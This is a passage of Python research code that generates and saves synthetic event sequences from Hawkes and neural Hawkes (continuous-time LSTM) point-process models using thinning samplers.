                -self.delta[:, type_event] * change_time
            )
            self.intensity_tilde += numpy.copy(
                self.alpha[:, type_event] * decay_frac
            )
        self.intensity = self.soft_relu(
            self.intensity_tilde
        )

    def compute_intensity_upper_bound(self, time_current):
        '''Compute self.intensity_ub, an upper bound on the intensity at
        any time >= time_current (with no new events): only the positive
        parts of alpha contribute, so the bound decays monotonically.
        mu is used as-is (not relu-ed) for speed; since softplus is
        monotone the result is still a valid upper bound.'''
        self.intensity_tilde_ub = numpy.copy(
            self.mu
        )
        for event in self.one_seq:
            time_since_start = event['time_since_start']
            type_event = event['type_event']
            change_time = time_current - time_since_start
            decay_frac = numpy.exp(
                -self.delta[:, type_event] * change_time
            )
            self.intensity_tilde_ub += numpy.copy(
                self.hard_relu(
                    self.alpha[:, type_event]
                ) * decay_frac
            )
        self.intensity_ub = self.soft_relu(
            self.intensity_tilde_ub
        )

    def sample_time_given_type(self, type_event):
        '''Sample the arrival time of the next event of type type_event
        (the "k" of the model formulation) via thinning against the
        per-type upper bound, starting from the last event time in
        self.one_seq (or 0 if empty).'''
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.copy(
            self.intensity_ub[type_event]
        )
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += (E / intensity_hazard)
            self.compute_intensity_given_past(time_current)
            # Accept when U * proposal_rate <= true intensity.
            u = U * intensity_hazard / self.intensity[type_event]
            # Adaptive thinning: refresh the (decaying) upper bound so
            # later proposals reject less often.  Not used when the
            # project's original data was generated; only for sampling
            # from pre-trained models.
            self.compute_intensity_upper_bound(time_current)
            intensity_hazard = numpy.copy(
                self.intensity_ub[type_event]
            )
        return time_current

    def sample_time_for_all_type(self):
        '''Sample the arrival time of the next event of ANY type via
        thinning against the summed upper bound, starting from the last
        event time in self.one_seq (or 0 if empty).'''
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.sum(self.intensity_ub)
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += (E / intensity_hazard)
            self.compute_intensity_given_past(time_current)
            u = U * intensity_hazard / numpy.sum(self.intensity)
            # Adaptive thinning deliberately left disabled here (the
            # initial bound remains valid since it only decays):
            # self.compute_intensity_upper_bound(time_current)
            # intensity_hazard = numpy.sum(self.intensity_ub)
        return time_current

    def sample_one_event_sep(self):
        '''Sample a candidate time per event type independently and keep
        the earliest one; returns (time_since_start, type_event).'''
        time_of_happen = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        for type_event in range(self.dim_process):
            # One thinning run per type.
            time_of_happen[type_event] = numpy.copy(
                self.sample_time_given_type(
                    type_event
                )
            )
        time_since_start_new = numpy.min(time_of_happen)
        type_event_new = numpy.argmin(time_of_happen)
        return time_since_start_new, type_event_new

    def sample_one_event_tog(self):
        '''Sample one time from the total intensity, then draw the type
        proportionally to the per-type intensities at that time.'''
        time_since_start_new = self.sample_time_for_all_type()
        self.compute_intensity_given_past(
            time_since_start_new
        )
        prob = self.intensity / numpy.sum(self.intensity)
        # NOTE(review): prob is float32; numpy.random.choice requires the
        # probabilities to sum to 1 within a tight tolerance -- confirm
        # this never trips for large dim_process.
        type_event_new = numpy.random.choice(
            range(self.dim_process), p=prob
        )
        return time_since_start_new, numpy.int32(type_event_new)

    def sample_one_event(self):
        '''Dispatch to the joint or per-type sampler per self.sum_for_time.'''
        if self.sum_for_time:
            return self.sample_one_event_tog()
        else:
            return self.sample_one_event_sep()

    def gen_one_seq(self, max_len):
        '''
        Generate one sequence of max_len events into self.one_seq.

        Liniger (2009), p. 28, describes the "thinning algorithm":
        generate one event of each type, take the minimum, and discard
        the others.  max_len is a pre-sampled length for the sequence.
        Each stored event records its running index, type, absolute time,
        time since the previous event, and time since the previous event
        of the same type.
        '''
        self.restart_sequence()
        time_since_start = numpy.float32(0.0)
        # Last occurrence time per type, for time_since_last_same_event.
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        for idx_event in range(max_len):
            time_since_start_new, type_event_new = self.sample_one_event()
            self.cnt_total_event += 1
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )

    def gen_seqs(self, settings):
        '''Generate settings['num_seqs'] sequences into self.list_seqs,
        each with a length drawn uniformly from
        [settings['min_len'], settings['max_len']].'''
        num_seqs = settings['num_seqs']
        self.list_seqs = []
        cnt_seqs = 0
        while cnt_seqs < num_seqs:
            max_len = numpy.int32(
                round(
                    numpy.random.uniform(
                        low=settings['min_len'],
                        high=settings['max_len']
                    )
                )
            )
            self.gen_one_seq(max_len)
            self.list_seqs.append(self.one_seq)
            cnt_seqs += 1
            # Progress report every 10 sequences.
            if cnt_seqs % 10 == 9:
                print("idx seq of gen : ", (cnt_seqs, self.name))
                print("total number of seqs : ", num_seqs)

    def print_some(self):
        '''Pretty-print up to the first 10 generated sequences.'''
        print("printing some seqs ... ")
        # Clamp to the number of sequences actually generated; the old
        # hard-coded range(10) raised IndexError for fewer than 10 seqs.
        for idx_seq in range(min(10, len(self.list_seqs))):
            print("the id of this seq is : ", idx_seq)
            seq = self.list_seqs[idx_seq]
            list_events = []
            list_time = []
            list_dtime = []
            list_items = []
            for event_item in seq:
                list_events.append(event_item['type_event'])
                list_time.append(
                    round(event_item['time_since_start'], 4)
                )
                list_dtime.append(
                    round(event_item['time_since_last_event'], 4)
                )
                list_items.append(
                    (
                        event_item['type_event'],
                        round(
                            event_item['time_since_last_event'], 4
                        )
                    )
                )
            print("the events, time and diff time for : ", idx_seq)
            print(list_events)
            print(list_time)
            print(list_dtime)
            print("the list of items is : ")
            print(list_items)

    def save_seqs(self, file_save):
        '''Pickle the generated sequences to file_save.'''
        with open(file_save, 'wb') as f:
            pickle.dump(self.list_seqs, f)
class NeuralHawkesCTLSTM(object):
    '''
    Sequence generator using the Neural Hawkes process with a
    continuous-time LSTM: cell values decay toward per-cell targets
    between events, so the intensity evolves continuously in time.

    Fixes vs. the previous revision:
    * `== None` -> `is None`
    * `soft_relu_scale` no longer mutates its argument in place
      (it used to clobber self.intensity_tilde through `x /= scale`)
    * `print_some` no longer raises IndexError for < 10 sequences
    '''
    def __init__(self, settings):
        # settings keys read here: 'args', 'sum_for_time',
        # 'path_pre_train', and -- when initializing randomly --
        # 'dim_process', 'dim_LSTM', 'seed_random'.
        print("initializing generator ... ")
        self.args = settings['args']
        self.sum_for_time = settings['sum_for_time']
        self.dim_float = numpy.int32(32)
        if settings['path_pre_train'] is None:
            print("random parameters ... ")
            self.dim_process = settings['dim_process']
            self.dim_model = settings['dim_LSTM']
            self.dim_time = self.dim_float
            #
            numpy.random.seed(
                settings['seed_random']
            )
            # per-type scale of the soft-plus transfer; fixed at ones
            self.scale = numpy.float32(
                numpy.ones( (self.dim_process, ) )
            )
            # NOTE: the parameter draws below consume the seeded RNG in
            # a fixed order; do not reorder them.
            self.W_alpha = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (self.dim_model, self.dim_process)
                )
            )
            # one extra embedding row for the BOS marker (type dim_process)
            self.Emb_event = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (
                        self.dim_process + numpy.int32(1),
                        self.dim_model
                    )
                )
            )
            # the CT-LSTM uses 7 gate blocks:
            # input, forget, output, pre-cell, input_bar, forget_bar, decay
            self.W_recur = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (
                        2 * self.dim_model,
                        7 * self.dim_model
                    )
                )
            )
            self.b_recur = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (7 * self.dim_model, )
                )
            )
        else:
            print("read pretrained model ... ")
            path_pre_train = os.path.abspath(
                settings['path_pre_train']
            )
            with open(path_pre_train, 'rb') as f:
                model_pre_train = pickle.load(f)
            self.dim_process = model_pre_train['dim_process']
            self.dim_model = model_pre_train['dim_model']
            self.dim_time = model_pre_train['dim_time']
            #
            self.scale = model_pre_train['scale']
            self.W_alpha = model_pre_train['W_alpha']
            self.Emb_event = model_pre_train['Emb_event']
            self.W_recur = model_pre_train['W_recur']
            self.b_recur = model_pre_train['b_recur']
        #
        self.name = 'NeuralHawkesGenCTLSTM'
        #
        self.intensity_tilde = None
        self.intensity = None
        #
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        self.one_seq = []
        # BOS marker: a pseudo event of type dim_process at time 0,
        # used to initialize the LSTM state
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        # continuous-time LSTM state: current cell, its decay target,
        # the decay rate, and the output gate of the last update
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_target = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_decay = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.gate_output = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cnt_total_event = numpy.int32(len(self.one_seq) )
        print("initialization done ")
    #
    def set_args(self, dict_args):
        self.args = dict_args
    #
    def soft_relu(self, x):
        # soft-plus: log(1 + e^x)
        return numpy.log(numpy.float32(1.0)+numpy.exp(x))
    #
    def soft_relu_scale(self, x):
        # scaled soft-plus: s * log(1 + e^(x / s)),
        # where the last dim of x is dim_process.
        # Fixed: compute on a copy; the old in-place `x /= self.scale`
        # silently mutated the caller's array (e.g. self.intensity_tilde).
        y = x / self.scale
        y = numpy.log(numpy.float32(1.0)+numpy.exp(y))
        y *= self.scale
        return y
    #
    def hard_relu(self, x):
        # max(0, x) without branching
        return numpy.float32(0.5) * (x + numpy.abs(x) )
    #
    def save_model(self, file_save):
        # Pickle all parameters and metadata so __init__ can reload
        # them through settings['path_pre_train'].
        print("saving model of generator ... ")
        model_dict = {
            'scale': numpy.copy(self.scale),
            'W_alpha': numpy.copy(self.W_alpha),
            'Emb_event': numpy.copy(self.Emb_event),
            'W_recur': numpy.copy(self.W_recur),
            'b_recur': numpy.copy(self.b_recur),
            'dim_process': self.dim_process,
            'dim_model': self.dim_model,
            'dim_time': self.dim_time,
            'dim_float': self.dim_float,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)
    #
    def restart_sequence(self):
        # clear the events memory and reset starting time to 0
        self.intensity_tilde = None
        self.intensity = None
        #
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        self.one_seq = []
        # BOS marker, mirrors __init__
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_target = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_decay = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.gate_output = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cnt_total_event = numpy.int32(len(self.one_seq) )
    #
    def sigmoid(self, x):
        return 1 / (1+numpy.exp(-x))
    #
    def compute_hidden_states(self):
        # Update the CT-LSTM state for the most recent event in one_seq.
        # Unlike rnn_unit in the models (update-then-decay over
        # time_since_this_event_to_next), here we decay over
        # time_since_last_event first, THEN apply the update, because
        # this is called right after an event is generated and appended.
        #
        # step 1: decay the cell toward its target since the last event
        cell_t_after_decay = self.cell_target + (
            self.cell_t - self.cell_target
        ) * numpy.exp(
            -self.cell_decay * self.one_seq[-1][
                'time_since_last_event'
            ]
        )
        hidden_t_after_decay = self.gate_output * numpy.tanh(
            cell_t_after_decay
        )
        # step 2: standard gated update using the event embedding
        emb_event_t = self.Emb_event[
            self.one_seq[-1]['type_event'], :
        ]
        post_transform = numpy.dot(
            numpy.concatenate(
                (emb_event_t, hidden_t_after_decay),
                axis = 0
            ), self.W_recur
        ) + self.b_recur
        #
        gate_input = self.sigmoid(
            post_transform[:self.dim_model]
        )
        gate_forget = self.sigmoid(
            post_transform[self.dim_model:2*self.dim_model]
        )
        gate_output = self.sigmoid(
            post_transform[2*self.dim_model:3*self.dim_model]
        )
        gate_pre_c = numpy.tanh(
            post_transform[3*self.dim_model:4*self.dim_model]
        )
        # input_bar and forget_bar gates drive the decay target
        gate_input_target = self.sigmoid(
            post_transform[4*self.dim_model:5*self.dim_model]
        )
        gate_forget_target = self.sigmoid(
            post_transform[5*self.dim_model:6*self.dim_model]
        )
        # cell memory decay rate (must be positive, hence soft-plus)
        cell_decay = self.soft_relu(
            post_transform[6*self.dim_model:]
        )
        #
        cell_t = gate_forget * cell_t_after_decay + gate_input * gate_pre_c
        cell_target = gate_forget_target * self.cell_target + gate_input_target * gate_pre_c
        #
        self.cell_t = numpy.copy(cell_t)
        self.cell_target = numpy.copy(cell_target)
        self.cell_decay = numpy.copy(cell_decay)
        self.gate_output = numpy.copy(gate_output)
    #
    def compute_intensity_given_past(self, time_current):
        # Compute the intensity at time_current given the past events:
        # decay the cell from the most recent event, read out the hidden
        # state, and map it through W_alpha + scaled soft-plus.
        time_recent = self.one_seq[-1]['time_since_start']
        #
        cell_t_after_decay = self.cell_target + (
            self.cell_t - self.cell_target
        ) * numpy.exp(
            -self.cell_decay * (
                time_current - time_recent
            )
        )
        hidden_t_after_decay = self.gate_output * numpy.tanh(
            cell_t_after_decay
        )
        #
        self.intensity_tilde = numpy.dot(
            hidden_t_after_decay, self.W_alpha
        )
        self.intensity = self.soft_relu_scale(
            self.intensity_tilde
        )
    #
    def compute_intensity_upper_bound(self, time_current):
        # Compute an upper bound of the intensity at the current time.
        # Note : this is very tricky !!!
        # In a decomposable process finding an upper bound is easy
        # (see B.3 in the NIPS paper), but the neural intensity is not
        # a combination of POSITIVE decreasing functions. So we split
        # the readout into terms (dc = c - c_target):
        #   w+ dc-  increasing   -> zeroed out (upper-limited)
        #   w+ dc+  decreasing   -> kept
        #   w- dc+  decreasing   -> kept
        #   w- dc-  increasing   -> zeroed out (upper-limited)
        time_recent = self.one_seq[-1]['time_since_start']
        #
        cell_gap = self.cell_t - self.cell_target
        cell_gap_matrix = numpy.outer(
            cell_gap, numpy.ones(
                (self.dim_process, ), dtype=dtype
            )
        )
        # (dim_model, dim_process)
        index_increasing_0 = (cell_gap_matrix > 0.0) & (self.W_alpha < 0.0)
        index_increasing_1 = (cell_gap_matrix < 0.0) & (self.W_alpha > 0.0)
        #
        cell_gap_matrix[
            index_increasing_0
        ] = numpy.float32(0.0)
        cell_gap_matrix[
            index_increasing_1
        ] = numpy.float32(0.0)
        #
        cell_t_after_decay = numpy.outer(
            self.cell_target, numpy.ones(
                (self.dim_process, ), dtype=dtype
            )
        ) + cell_gap_matrix * numpy.exp(
            -numpy.outer(
                self.cell_decay, numpy.ones(
                    (self.dim_process, ), dtype=dtype
                )
            ) * (
                time_current - time_recent
            )
        )
        hidden_t_after_decay = numpy.outer(
            self.gate_output, numpy.ones(
                (self.dim_process, ), dtype=dtype
            )
        ) * numpy.tanh(cell_t_after_decay)
        #
        self.intensity_tilde_ub = numpy.sum(
            hidden_t_after_decay * self.W_alpha,
            axis=0
        )
        self.intensity_ub = self.soft_relu_scale(
            self.intensity_tilde_ub
        )
    #
    def sample_time_given_type(self, type_event):
        # Thinning (rejection) sampler for the next time of one event
        # type ("little k" in the paper): propose exponential jumps
        # under the constant hazard intensity_ub[k], accept with
        # probability intensity[k] / hazard.
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        #
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.copy(
            self.intensity_ub[type_event]
        )
        #
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += (E / intensity_hazard)
            self.compute_intensity_given_past(time_current)
            u = U * intensity_hazard / self.intensity[type_event]
            # use adaptive thinning algorithm
            # that is, decreasing the upper bound
            # to make the sampling quicker
            # use adaptive method by
            # toggling on the following block
            '''
            self.compute_intensity_upper_bound(
                time_current
            )
            intensity_hazard = numpy.copy(
                self.intensity_ub[type_event]
            )
            '''
        return time_current
    #
    def sample_time_for_all_type(self):
        # Thinning sampler for the next event time of the superposed
        # process (sum of intensities over all types).
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        #
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.sum(self.intensity_ub)
        #
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += (E / intensity_hazard)
            self.compute_intensity_given_past(time_current)
            u = U * intensity_hazard / numpy.sum(self.intensity)
            # use adaptive thinning algorithm
            # that is, decreasing the upper bound
            # to make the sampling quicker
            # use adaptive method by
            # toggling on the following block
            '''
            self.compute_intensity_upper_bound(
                time_current
            )
            intensity_hazard = numpy.sum(self.intensity_ub)
            '''
        return time_current
    #
    def sample_one_event_sep(self):
        # Sample one candidate time per type, keep the earliest.
        time_of_happen = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        for type_event in range(self.dim_process):
            # sample one event using "thinning algorithm"
            time_of_happen[type_event] = numpy.copy(
                self.sample_time_given_type(
                    type_event
                )
            )
        #
        time_since_start_new = numpy.min(time_of_happen)
        type_event_new = numpy.argmin(time_of_happen)
        return time_since_start_new, type_event_new
    #
    def sample_one_event_tog(self):
        # Sample the next time from the superposed process, then draw
        # the type in proportion to the per-type intensities.
        time_since_start_new = self.sample_time_for_all_type()
        self.compute_intensity_given_past(
            time_since_start_new
        )
        prob = self.intensity / numpy.sum(self.intensity)
        type_event_new = numpy.random.choice(
            range(self.dim_process), p = prob
        )
        return time_since_start_new, numpy.int32(type_event_new)
    #
    def sample_one_event(self):
        # Dispatch on the strategy chosen at construction time.
        if self.sum_for_time:
            return self.sample_one_event_tog()
        else:
            return self.sample_one_event_sep()
    #
    def gen_one_seq(self, max_len):
        self.restart_sequence()
        '''
        Liiniger (2009), p. 28, describes a "thinning algorithm":
        generate one event of each type, take the minimum,
        and discard the others.
        Details found in NIPS 17 Appendix
        max_len is a pre-sampled value to set the length of seq
        '''
        # initialize the seq
        time_since_start = numpy.float32(0.0)
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        #
        for idx_event in range(max_len):
            # refresh the CT-LSTM state for the most recent event
            # before sampling the next one
            self.compute_hidden_states()
            #
            time_since_start_new, type_event_new = self.sample_one_event()
            self.cnt_total_event += 1
            #
            # update sequence
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
        #
        # throw away the BOS item at the head of the sequence
        self.one_seq.pop(0)
    #
    def gen_seqs(self, settings):
        # Generate settings['num_seqs'] sequences; each length is drawn
        # uniformly from [settings['min_len'], settings['max_len']].
        print("generating sequences ... ")
        num_seqs = settings['num_seqs']
        #
        self.list_seqs = []
        cnt_seqs = 0
        while cnt_seqs < num_seqs:
            #
            max_len = numpy.int32(
                round(
                    numpy.random.uniform(
                        low=settings['min_len'],
                        high=settings['max_len']
                    )
                )
            )
            #
            self.gen_one_seq(max_len)
            self.list_seqs.append(self.one_seq)
            cnt_seqs += 1
            if cnt_seqs % 10 == 9:
                print("idx seq of gen : ", (cnt_seqs, self.name))
                print("total number of seqs : ", num_seqs)
    #
    def print_some(self):
        # Pretty-print up to the first 10 generated sequences.
        # Fixed: clamp to len(self.list_seqs) so fewer than 10
        # sequences no longer raises IndexError.
        print("printing some seqs ... ")
        for idx_seq in range(min(10, len(self.list_seqs))):
            print("the id of this seq is : ", idx_seq)
            seq = self.list_seqs[idx_seq]
            list_events = []
            list_time = []
            list_dtime = []
            list_items = []
            for event_item in seq:
                list_events.append(event_item['type_event'])
                list_time.append(
                    round(event_item['time_since_start'], 4)
                )
                list_dtime.append(
                    round(event_item['time_since_last_event'], 4)
                )
                list_items.append(
                    (
                        event_item['type_event'],
                        round(
                            event_item['time_since_last_event'], 4
                        )
                    )
                )
            print("the events, time and diff time for : ", idx_seq)
            print(list_events)
            print(list_time)
            print(list_dtime)
            print("the list of items is : ")
            print(list_items)
    #
    def save_seqs(self, file_save):
        # Persist generated sequences with pickle.
        with open(file_save, 'wb') as f:
            pickle.dump(self.list_seqs, f)
#
#
#
#
#
#
# deprecated generators
# TODO: modules below are deprecated
# they are models that we tried over this project
# most of them work, better than Hawkes baseline
# but still lose to our neural Hawkes with continuous-time LSTM
# most of them keep the decomposable structure of Hawkes
# and try to use neural networks to parametrize it
#
#
class NeuralHawkesGen(object):
    '''
    Sequence generator using the (decomposable) Neural Hawkes process:
    a discrete LSTM over events, with per-(hidden, type) exponential
    decays `delta` applied to the hidden state in the intensity.

    Fixes vs. the previous revision:
    * `float32_to_bit` called `ord()` on the items of a `bytes` object,
      which are already ints on Python 3 (TypeError) -- now portable.
    * `print_some` no longer raises IndexError for < 10 sequences.
    '''
    def __init__(self, settings):
        # settings keys read here: 'dim_process', 'dim_LSTM', 'args',
        # 'seed_random'.
        self.dim_process = settings['dim_process']
        self.dim_model = settings['dim_LSTM']
        #
        # elapsed times are fed to the LSTM as 32-bit encodings
        self.dim_float = numpy.int32(32)
        self.dim_time = self.dim_float
        #
        self.args = settings['args']
        # NOTE: the draws below consume the seeded RNG in a fixed order;
        # do not reorder them.
        numpy.random.seed(
            settings['seed_random']
        )
        # base (exogenous) intensity per event type
        self.mu = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (self.dim_process,)
            )
        )
        # decay rates of the hidden contribution per (hidden, type)
        self.delta = numpy.float32(
            numpy.random.uniform(
                low=10.0, high=20.0,
                size=(self.dim_model, self.dim_process)
            )
        )
        #
        self.W_alpha = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (self.dim_model, self.dim_process)
            )
        )
        # one extra embedding row for the BOS marker (type dim_process)
        self.Emb_event = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    self.dim_process + numpy.int32(1),
                    self.dim_model
                )
            )
        )
        self.Emb_time = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    self.dim_time, self.dim_model
                )
            )
        )
        self.W_recur = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (
                    3 * self.dim_model,
                    4 * self.dim_model
                )
            )
        )
        self.b_recur = numpy.float32(
            numpy.random.uniform(
                low = -1.0,
                high = 1.0,
                size = (4*self.dim_model, )
            )
        )
        #
        self.name = 'NeuralHawkesGen'
        #
        self.intensity_tilde = None
        self.intensity = None
        #
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        self.one_seq = []
        # BOS marker: a pseudo event of type dim_process at time 0
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    def soft_relu(self, x):
        # soft-plus: log(1 + e^x)
        return numpy.log(numpy.float32(1.0)+numpy.exp(x))
    #
    def hard_relu(self, x):
        # max(0, x) without branching
        return numpy.float32(0.5) * (x + numpy.abs(x) )
    #
    def save_model(self, file_save):
        # Pickle all parameters and metadata.
        print("saving model of generator ... ")
        model_dict = {
            'mu': numpy.copy(self.mu),
            'delta': numpy.copy(self.delta),
            'W_alpha': numpy.copy(self.W_alpha),
            'Emb_event': numpy.copy(self.Emb_event),
            'Emb_time': numpy.copy(self.Emb_time),
            'W_recur': numpy.copy(self.W_recur),
            'b_recur': numpy.copy(self.b_recur),
            'dim_process': self.dim_process,
            'dim_model': self.dim_model,
            'dim_time': self.dim_time,
            'dim_float': self.dim_float,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)
    #
    def restart_sequence(self):
        # clear the events memory and reset starting time to 0
        self.intensity_tilde = None
        self.intensity = None
        #
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        self.one_seq = []
        # BOS marker, mirrors __init__
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    def float32_to_bit(self, float_input):
        '''
        Convert a number to float32 and return its 32-bit IEEE-754
        big-endian representation as a 0/1 vector of length dim_float.
        '''
        float32_input = numpy.float32(float_input)
        packed = struct.pack('!f', float32_input)
        # Python 3 yields ints when iterating bytes; Python 2 yields
        # 1-char strings -- handle both (the old code always called
        # ord(), which fails with TypeError on Python 3).
        str_input = ''.join(
            format(c if isinstance(c, int) else ord(c), '08b')
            for c in packed
        )
        bit_input = numpy.zeros(
            (self.dim_float,), dtype=dtype
        )
        assert(self.dim_float == len(str_input))
        for idx, item_in_input in enumerate(str_input):
            bit_input[idx] = numpy.float32(item_in_input)
        return numpy.copy(bit_input)
    #
    def sigmoid(self, x):
        return 1 / (1+numpy.exp(-x))
    #
    def compute_hidden_states(self):
        # One discrete LSTM update for the most recent event in one_seq:
        # embed its type and (bit-encoded) elapsed time, apply the
        # recurrent transform, and refresh hidden_t / cell_t.
        emb_event_t = self.Emb_event[
            self.one_seq[-1]['type_event'], :
        ]
        emb_time_t = numpy.dot(
            self.float32_to_bit(
                self.one_seq[-1]['time_since_last_event']
            ),
            self.Emb_time
        )
        post_transform = numpy.dot(
            numpy.concatenate(
                (emb_event_t, emb_time_t, self.hidden_t),
                axis = 0
            ),
            self.W_recur
        ) + self.b_recur
        #
        gate_input = self.sigmoid(
            post_transform[:self.dim_model]
        )
        gate_forget = self.sigmoid(
            post_transform[self.dim_model:2*self.dim_model]
        )
        gate_output = self.sigmoid(
            post_transform[2*self.dim_model:3*self.dim_model]
        )
        gate_pre_c = numpy.tanh(
            post_transform[3*self.dim_model:]
        )
        #
        cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
        hidden_t_new = gate_output * numpy.tanh(cell_t_new)
        self.hidden_t = numpy.copy(hidden_t_new)
        self.cell_t = numpy.copy(cell_t_new)
    #
    def compute_intensity_given_past(self, time_current):
        # Intensity at time_current: hidden contributions decayed with
        # per-(hidden, type) rates delta, mapped through W_alpha + mu
        # and the soft-plus transfer.
        time_recent = self.one_seq[-1]['time_since_start']
        #
        hidden_with_time = numpy.exp(
            -self.delta * (
                time_current - time_recent
            )
        ) * self.hidden_t[:, None]
        # (self.dim_model, self.dim_process), same shape as W_alpha
        self.intensity_tilde = numpy.sum(
            self.W_alpha * hidden_with_time,
            axis = 0
        ) + self.mu
        #
        self.intensity = self.soft_relu(
            self.intensity_tilde
        )
    #
    def compute_intensity_upper_bound(self, time_current):
        # Upper bound of the intensity at the current time: keep only
        # the nonnegative contributions (hard_relu), which can only
        # overestimate the readout before the monotone soft-plus.
        time_recent = self.one_seq[-1]['time_since_start']
        #
        hidden_with_time = numpy.exp(
            -self.delta * (
                time_current - time_recent
            )
        ) * self.hidden_t[:, None]
        # (self.dim_model, self.dim_process), same shape as W_alpha
        self.intensity_tilde_ub = numpy.sum(
            self.hard_relu(
                self.W_alpha * hidden_with_time
            ),
            axis = 0
        ) + self.hard_relu(self.mu)
        #
        self.intensity_ub = self.soft_relu(
            self.intensity_tilde_ub
        )
    #
    def sample_time_given_type(self, type_event):
        # Thinning (rejection) sampler for the next time of one event
        # type ("little k" in the paper): exponential proposals under
        # the constant hazard intensity_ub[k], accepted with
        # probability intensity[k] / hazard.
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        #
        self.compute_intensity_upper_bound(time_current)
        #
        intensity_hazard = numpy.copy(
            self.intensity_ub[type_event]
        )
        #
        u = 1.5
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
